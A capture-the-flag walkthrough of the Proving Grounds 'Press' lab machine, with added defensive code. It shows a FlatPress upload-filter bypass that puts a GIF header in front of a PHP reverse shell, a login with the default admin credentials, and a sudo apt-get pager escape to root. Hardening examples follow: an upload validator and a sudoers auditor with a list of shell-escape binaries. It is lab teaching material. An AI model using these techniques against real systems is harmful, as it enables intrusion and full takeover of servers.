In this walkthrough, we will be going through the Press room from Proving Grounds. The room is rated Intermediate on the platform and consists of exploiting FlatPress CMS through a file upload attack to get the initial foothold. For privilege escalation, a sudo misconfiguration for the apt-get binary has to be exploited to get root. So, let's get started without any delay.
Machine Info:
| Field | Value |
|---|---|
| Title | Press |
| IP address | 192.168.169.29 |
| Difficulty | Intermediate |
| OS | Linux |
| Description | Press is an Intermediate Linux machine running FlatPress CMS, which can be exploited through a file upload attack to get the initial foothold. For privilege escalation, exploitation of the sudo misconfiguration for the apt-get binary is required. |
Enumeration:
- I started off with a regular aggressive nmap scan and found only 3 ports open: 22 (SSH), 80 (HTTP) and 8089 (HTTP).
```
$ sudo nmap -A 192.168.169.29
[sudo] password for wh1terose:
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-06 21:20 IST
Nmap scan report for 192.168.169.29
Host is up (0.21s latency).
Not shown: 996 closed ports
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| vulners:
|   cpe:/a:openbsd:openssh:8.4p1:
|       PRION:CVE-2016-20012  5.0  https://vulners.com/prion/PRION:CVE-2016-20012
|       PRION:CVE-2021-28041  4.6  https://vulners.com/prion/PRION:CVE-2021-28041
|       CVE-2021-28041        4.6  https://vulners.com/cve/CVE-2021-28041
|       PRION:CVE-2021-41617  4.4  https://vulners.com/prion/PRION:CVE-2021-41617
|       CVE-2021-41617        4.4  https://vulners.com/cve/CVE-2021-41617
|       PRION:CVE-2020-14145  4.3  https://vulners.com/prion/PRION:CVE-2020-14145
|       CVE-2020-14145        4.3  https://vulners.com/cve/CVE-2020-14145
|       CVE-2016-20012        4.3  https://vulners.com/cve/CVE-2016-20012
|       PRION:CVE-2021-36368  2.6  https://vulners.com/prion/PRION:CVE-2021-36368
|_      CVE-2021-36368        2.6  https://vulners.com/cve/CVE-2021-36368
53/tcp   filtered domain
80/tcp   open     http    Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Lugx Gaming Shop HTML5 Template
| vulners:
|   cpe:/a:apache:http_server:2.4.56:
|       OSV:BIT-2023-31122                    6.4  https://vulners.com/osv/OSV:BIT-2023-31122
|       OSV:BIT-APACHE-2023-45802             5.0  https://vulners.com/osv/OSV:BIT-APACHE-2023-45802
|       OSV:BIT-APACHE-2023-43622             5.0  https://vulners.com/osv/OSV:BIT-APACHE-2023-43622
|       OSV:BIT-APACHE-2023-31122             5.0  https://vulners.com/osv/OSV:BIT-APACHE-2023-31122
|       OSV:BIT-2023-45802                    5.0  https://vulners.com/osv/OSV:BIT-2023-45802
|       OSV:BIT-2023-43622                    5.0  https://vulners.com/osv/OSV:BIT-2023-43622
|       F7F6E599-CEF4-5E03-8E10-FE18C4101E38  5.0  https://vulners.com/githubexploit/F7F6E599-CEF4-5E03-8E10-FE18C4101E38  *EXPLOIT*
|       E5C174E5-D6E8-56E0-8403-D287DE52EB3F  5.0  https://vulners.com/githubexploit/E5C174E5-D6E8-56E0-8403-D287DE52EB3F  *EXPLOIT*
|       DB6E1BBD-08B1-574D-A351-7D6BB9898A4A  5.0  https://vulners.com/githubexploit/DB6E1BBD-08B1-574D-A351-7D6BB9898A4A  *EXPLOIT*
|       CVE-2023-43622                        5.0  https://vulners.com/cve/CVE-2023-43622
|       CVE-2023-31122                        5.0  https://vulners.com/cve/CVE-2023-31122
|       CNVD-2023-93320                       5.0  https://vulners.com/cnvd/CNVD-2023-93320
|       C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B  5.0  https://vulners.com/githubexploit/C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B  *EXPLOIT*
|       BD3652A9-D066-57BA-9943-4E34970463B9  5.0  https://vulners.com/githubexploit/BD3652A9-D066-57BA-9943-4E34970463B9  *EXPLOIT*
|       B0208442-6E17-5772-B12D-B5BE30FA5540  5.0  https://vulners.com/githubexploit/B0208442-6E17-5772-B12D-B5BE30FA5540  *EXPLOIT*
|       A820A056-9F91-5059-B0BC-8D92C7A31A52  5.0  https://vulners.com/githubexploit/A820A056-9F91-5059-B0BC-8D92C7A31A52  *EXPLOIT*
|       9814661A-35A4-5DB7-BB25-A1040F365C81  5.0  https://vulners.com/githubexploit/9814661A-35A4-5DB7-BB25-A1040F365C81  *EXPLOIT*
|       5A864BCC-B490-5532-83AB-2E4109BB3C31  5.0  https://vulners.com/githubexploit/5A864BCC-B490-5532-83AB-2E4109BB3C31  *EXPLOIT*
|       17C6AD2A-8469-56C8-BBBE-1764D0DF1680  5.0  https://vulners.com/githubexploit/17C6AD2A-8469-56C8-BBBE-1764D0DF1680  *EXPLOIT*
|_      CVE-2023-45802                        2.6  https://vulners.com/cve/CVE-2023-45802
8089/tcp open     http    Apache httpd 2.4.56 ((Debian))
|_http-generator: FlatPress fp-1.2.1
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: FlatPress
| vulners:
|   cpe:/a:apache:http_server:2.4.56:
|       OSV:BIT-2023-31122                    6.4  https://vulners.com/osv/OSV:BIT-2023-31122
|       OSV:BIT-APACHE-2023-45802             5.0  https://vulners.com/osv/OSV:BIT-APACHE-2023-45802
|       OSV:BIT-APACHE-2023-43622             5.0  https://vulners.com/osv/OSV:BIT-APACHE-2023-43622
|       OSV:BIT-APACHE-2023-31122             5.0  https://vulners.com/osv/OSV:BIT-APACHE-2023-31122
|       OSV:BIT-2023-45802                    5.0  https://vulners.com/osv/OSV:BIT-2023-45802
|       OSV:BIT-2023-43622                    5.0  https://vulners.com/osv/OSV:BIT-2023-43622
|       F7F6E599-CEF4-5E03-8E10-FE18C4101E38  5.0  https://vulners.com/githubexploit/F7F6E599-CEF4-5E03-8E10-FE18C4101E38  *EXPLOIT*
|       E5C174E5-D6E8-56E0-8403-D287DE52EB3F  5.0  https://vulners.com/githubexploit/E5C174E5-D6E8-56E0-8403-D287DE52EB3F  *EXPLOIT*
|       DB6E1BBD-08B1-574D-A351-7D6BB9898A4A  5.0  https://vulners.com/githubexploit/DB6E1BBD-08B1-574D-A351-7D6BB9898A4A  *EXPLOIT*
|       CVE-2023-43622                        5.0  https://vulners.com/cve/CVE-2023-43622
|       CVE-2023-31122                        5.0  https://vulners.com/cve/CVE-2023-31122
|       CNVD-2023-93320                       5.0  https://vulners.com/cnvd/CNVD-2023-93320
|       C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B  5.0  https://vulners.com/githubexploit/C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B  *EXPLOIT*
|       BD3652A9-D066-57BA-9943-4E34970463B9  5.0  https://vulners.com/githubexploit/BD3652A9-D066-57BA-9943-4E34970463B9  *EXPLOIT*
|       B0208442-6E17-5772-B12D-B5BE30FA5540  5.0  https://vulners.com/githubexploit/B0208442-6E17-5772-B12D-B5BE30FA5540  *EXPLOIT*
|       A820A056-9F91-5059-B0BC-8D92C7A31A52  5.0  https://vulners.com/githubexploit/A820A056-9F91-5059-B0BC-8D92C7A31A52  *EXPLOIT*
|       9814661A-35A4-5DB7-BB25-A1040F365C81  5.0  https://vulners.com/githubexploit/9814661A-35A4-5DB7-BB25-A1040F365C81  *EXPLOIT*
|       5A864BCC-B490-5532-83AB-2E4109BB3C31  5.0  https://vulners.com/githubexploit/5A864BCC-B490-5532-83AB-2E4109BB3C31  *EXPLOIT*
|       17C6AD2A-8469-56C8-BBBE-1764D0DF1680  5.0  https://vulners.com/githubexploit/17C6AD2A-8469-56C8-BBBE-1764D0DF1680  *EXPLOIT*
|_      CVE-2023-45802                        2.6  https://vulners.com/cve/CVE-2023-45802
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=2/6%OT=22%CT=1%CU=37943%PV=Y%DS=4%DC=T%G=Y%TM=65C2556B
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=FD%GCD=1%ISR=109%TI=Z%II=I%TS=A)SEQ(SP=FD%
OS:GCD=1%ISR=109%TI=Z%TS=A)OPS(O1=M54EST11NW7%O2=M54EST11NW7%O3=M54ENNT11NW
OS:7%O4=M54EST11NW7%O5=M54EST11NW7%O6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE88%
OS:W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1
OS:(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=
OS:40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%U
OS:N=0%RIPL=G%RID=G%RIPCK=G%RUCK=B10C%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1025/tcp)
HOP RTT       ADDRESS
1   217.57 ms 192.168.45.1
2   213.49 ms 192.168.45.254
3   217.61 ms 192.168.251.1
4   217.86 ms 192.168.169.29

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 61.44 seconds
```
- Enumerated the web server on port 80 and found a static gaming-themed website. Looked around the different pages on the site but found nothing interesting.
- Ran gobuster against the target web server to reveal hidden directories. Nothing useful turned up here either.
```
$ gobuster dir -u http://192.168.169.29/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt -x html
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.169.29/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              html
[+] Timeout:                 10s
===============================================================
2024/02/06 21:25:51 Starting gobuster in directory enumeration mode
===============================================================
/contact.html         (Status: 200) [Size: 6903]
/assets               (Status: 301) [Size: 317] [--> http://192.168.169.29/assets/]
/shop.html            (Status: 200) [Size: 11662]
/index.html           (Status: 200) [Size: 15103]
/vendor               (Status: 301) [Size: 317] [--> http://192.168.169.29/vendor/]
/server-status        (Status: 403) [Size: 279]
/product-details.html (Status: 200) [Size: 9655]
===============================================================
2024/02/06 21:39:53 Finished
===============================================================
```
- Next, enumerated the web server on port 8089 and found the FlatPress CMS running.
- Found a login panel in the right sidebar. The default username and password combination worked and gave access to the back end of the CMS.
admin: password
Initial Access:
- Once I landed in the Administration area, the Uploader functionality caught my attention. I first uploaded a plain text file and was able to upload it and reach it through the web server. Nice!
- But when I tried to upload a PHP reverse shell the same way, it threw an error instead.
- The Uploader checks the MIME type detected for the uploaded file and discards anything identified as PHP. This can be bypassed by prepending the magic header below: when the payload file is processed, the GIF signature causes it to be classified as image/gif instead of PHP.
GIF89a;
- Using the above technique, I was able to bypass the filter, then requested the uploaded payload to get a reverse connection back.
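The filter described above fails because it only sniffs the first bytes of the file. The following is an added example (not FlatPress code, and not the author's): a naive sniff of that kind beside a hardened validator that layers an extension allow-list, agreement between magic bytes and extension, a parseable GIF header and a scan for script openers anywhere in the body. The sample files and names (`MINIMAL_GIF`, `POLYGLOT_PHP`, `poly.gif`) are constructed here.

```python
"""Added example: naive MIME sniffing beside a layered upload validator.
Not FlatPress code. All sample inputs below are constructed."""
import re

# Constructed: the smallest structurally valid GIF.
MINIMAL_GIF = (
    b"GIF89a"             # signature and version
    b"\x01\x00\x01\x00"   # logical screen descriptor: 1 x 1 pixels
    b"\x00\x00\x00"       # packed flags, background colour index, aspect ratio
    b"\x3b"               # GIF trailer
)
# Constructed: GIF signature glued onto a PHP file, the shape of the bypass
# in the post, with a harmless echo standing in for the payload.
POLYGLOT_PHP = b"GIF89a;\n<?php echo 'constructed test file'; ?>"

# Extension allow-list mapped to the magic bytes each extension must start with.
ALLOWED_MAGIC = {
    "gif": b"GIF8",
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
}
# Server-side script openers that have no business inside an image.
SCRIPT_MARKERS = re.compile(rb"<\?php|<\?=|<script\b|<%", re.IGNORECASE)


def sniff_mime(data: bytes) -> str:
    """Naive magic-byte sniffing: looks only at the first few bytes."""
    if data.startswith(b"GIF8"):
        return "image/gif"
    if data.startswith(b"\x89PNG"):
        return "image/png"
    if data.startswith(b"\xff\xd8\xff"):
        return "image/jpeg"
    if data.lstrip().startswith(b"<?php"):
        return "text/x-php"
    return "application/octet-stream"


def naive_upload_check(data: bytes) -> bool:
    """The weak gate: accept anything that does not sniff as PHP."""
    return sniff_mime(data) != "text/x-php"


def gif_header_ok(data: bytes) -> bool:
    """Check the fixed GIF structure: signature, 7-byte logical screen
    descriptor with non-zero dimensions, and the 0x3B trailer as last byte."""
    if len(data) < 14 or data[:6] not in (b"GIF87a", b"GIF89a"):
        return False
    width = int.from_bytes(data[6:8], "little")
    height = int.from_bytes(data[8:10], "little")
    return width > 0 and height > 0 and data[-1:] == b"\x3b"


def validate_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Hardened gate: every layer must pass. Returns (accepted, reason)."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_MAGIC:
        return False, f"extension {ext!r} not in allow-list"
    if not data.startswith(ALLOWED_MAGIC[ext]):
        return False, "magic bytes do not match extension"
    if ext == "gif" and not gif_header_ok(data):
        return False, "GIF header does not parse"
    if SCRIPT_MARKERS.search(data):
        return False, "script tag found in body"
    return True, "ok"


if __name__ == "__main__":
    print("naive check, polyglot:", naive_upload_check(POLYGLOT_PHP))
    print("hardened, poly.php:", validate_upload("poly.php", POLYGLOT_PHP))
    print("hardened, poly.gif:", validate_upload("poly.gif", POLYGLOT_PHP))
    print("hardened, pixel.gif:", validate_upload("pixel.gif", MINIMAL_GIF))
```

The naive check accepts the polyglot because it never looks past the first six bytes; the hardened one rejects it on the extension, and even renamed to `.gif` it fails the header parse, and a better-formed polyglot still trips the script-marker scan. Content checks alone are not the whole fix: uploads should be stored under a random name outside the web root or in a directory where the server does not execute scripts (for Apache with mod_php, `php_admin_flag engine off` for that directory), so that a file which slips through is served as bytes rather than run.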
Privilege Escalation:
- Ran LinPEAS on the target to enumerate potential privilege escalation vectors and found that the apt-get binary can be run as root through sudo without a password.
- Next, used the GTFOBins technique for that binary to get root on the target and captured the root flag to mark the machine as complete.
```
sudo apt-get changelog apt
!/bin/sh
```
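The root cause here is a sudoers entry that lets an unprivileged user run, without a password, a binary that drops into a pager or spawns child processes. As an added example (not part of the walkthrough, and not LinPEAS or GTFOBins code), here is a small sudoers auditor that flags that class of entry: it parses user-spec lines, carries the NOPASSWD/PASSWD tag across comma-separated commands the way sudo does, and rates each command. The sudoers text, the usernames (`webdev`, `deploy`) and the `SHELL_ESCAPE_BINARIES` list are constructed; the list is an assumed subset of GTFOBins entries, not the full set, and aliases and include directives are not resolved.

```python
"""Added example: audit sudoers text for passwordless shell-escape entries.
Sample sudoers content and names are constructed, not taken from the target."""
import re
from dataclasses import dataclass

# Assumed subset of binaries known to yield a shell via pager, editor or
# interpreter when run under sudo (extend from GTFOBins as needed).
SHELL_ESCAPE_BINARIES = {
    "apt-get", "apt", "vim", "vi", "nano", "less", "more", "man",
    "find", "awk", "perl", "python3", "env", "bash", "sh",
}

SAMPLE_SUDOERS = """\
# Constructed sample, not the target's /etc/sudoers
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
# the entry class the walkthrough abuses
webdev  ALL=(ALL) NOPASSWD: /usr/bin/apt-get
# a tag stays in force for the commands that follow it on the line
deploy  ALL=(root) NOPASSWD: /bin/cat /var/log/apache2/error.log, /usr/bin/less
"""

USER_SPEC = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)
TAG = re.compile(
    r"^(NOPASSWD|PASSWD|SETENV|NOSETENV|NOEXEC|EXEC|LOG_INPUT|NOLOG_INPUT"
    r"|LOG_OUTPUT|NOLOG_OUTPUT|MAIL|NOMAIL|FOLLOW|NOFOLLOW):\s*"
)
SKIP_PREFIXES = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")


@dataclass
class Finding:
    user: str
    runas: str
    command: str
    nopasswd: bool
    risk: str


def classify(command: str) -> str:
    """Rate a command: 'ALL' (unrestricted), 'shell escape' (binary known to
    spawn a shell or pager) or 'review' (needs a human look)."""
    binary = command.split()[0].rsplit("/", 1)[-1]
    if binary == "ALL":
        return "ALL"
    if binary in SHELL_ESCAPE_BINARIES:
        return "shell escape"
    return "review"


def audit(sudoers_text: str) -> list[Finding]:
    """Parse user-spec lines and return one Finding per command."""
    findings = []
    for raw in sudoers_text.splitlines():
        # Drop comments; this also drops old-style #include lines (known limitation).
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = USER_SPEC.match(line)
        if not m or m.group("who") == "root":
            continue
        runas = m.group("runas") or "root"
        nopasswd = False  # sudo default; a tag changes it for later commands on the line
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            while (t := TAG.match(cmd)):
                if t.group(1) == "NOPASSWD":
                    nopasswd = True
                elif t.group(1) == "PASSWD":
                    nopasswd = False
                cmd = cmd[t.end():]
            findings.append(Finding(m.group("who"), runas, cmd, nopasswd, classify(cmd)))
    return findings


def high_risk(findings: list[Finding]) -> list[Finding]:
    """Entries that hand out root: unrestricted ALL, or a passwordless shell escape."""
    return [f for f in findings if f.risk == "ALL" or (f.nopasswd and f.risk == "shell escape")]


if __name__ == "__main__":
    for f in high_risk(audit(SAMPLE_SUDOERS)):
        print(f"{f.user:8} runas={f.runas:8} nopasswd={str(f.nopasswd):5} {f.risk:13} {f.command}")
```

Run against the constructed sample, the auditor reports the `webdev` apt-get entry and the `deploy` less entry as passwordless shell escapes, and the `%sudo` group entry as unrestricted. The fix for the entry class the walkthrough abuses is to remove it rather than narrow its arguments: apt-get invokes a pager and package hooks regardless of which subcommand is allowed. sudo's `NOEXEC` tag, which blocks child processes of dynamically linked binaries, is a partial mitigation, not a substitute.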
Conclusion:
So that was "Press" for you. We started off with a regular nmap scan and found 3 ports open: 22 (SSH), 80 (HTTP) and 8089 (HTTP). Enumerated the web server on port 8089 and found the FlatPress CMS running. Found a login panel in the right sidebar, where the default username and password combination got us into the back end of the CMS. Once in the Administration area, I uploaded my reverse shell payload and bypassed the upload filter to get the initial foothold on the target. For privilege escalation, the sudo misconfiguration for the apt-get binary was exploited to get root. On that note, I will take your leave and meet you in the next one. Till then, "Happy hacking".